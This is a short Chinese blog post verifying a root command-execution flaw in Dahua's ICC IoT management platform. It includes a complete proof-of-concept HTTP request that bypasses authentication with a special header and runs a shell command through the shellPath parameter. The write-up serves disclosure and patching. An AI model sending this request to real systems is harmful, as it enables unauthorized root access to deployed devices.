漏洞验证-大华ICC智能物联管理平台 push 存在命令执行漏洞

一、漏洞描述

大华ICC智能物联综合管理平台的/evo-runs/v1.0/push接口存在高危命令执行漏洞,攻击者可通过构造特殊请求绕过鉴权机制,直接以root权限在目标服务器上执行任意系统命令123。该漏洞影响广泛部署于智能园区、商业综合体等场景的大华智能物联管理平台。

漏洞源于平台对pushreceive接口的鉴权缺陷:

  1. 当请求头中包含X-Subject-Headerflag: ADAPT时,系统会跳过正常鉴权流程

  2. 接口处理用户输入时未做充分过滤,直接将shellPath参数内容传递给Runtime.getRuntime().exec()执行

  3. 命令执行权限为root,但存在部分限制(如命令中不能包含空格)

二、POC

POST /evo-runs/v1.0/push HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0
Content-Type: application/json
X-Subject-Headerflag: ADAPT
Content-Length: 258

{
 "method": "agent.ossm.mapping.config",
 "info": {
  "configure": "abcd",
  "filePath": "haha",
  "paramMap": {
   "shellPath": "/bin/bash -c id>/opt/evoWpms/static/xxx.txt",
   "filePath": "abc"
  },
  "requestIp": ""
 }
}

 

https://target.com/static/xxx.txt

三、验证截图

四、修复建议

请联系厂商安装补丁或使用防护设备进行拦截。

posted @ 2025-07-29 10:40  Domren  阅读(1470)  评论(0)    收藏  举报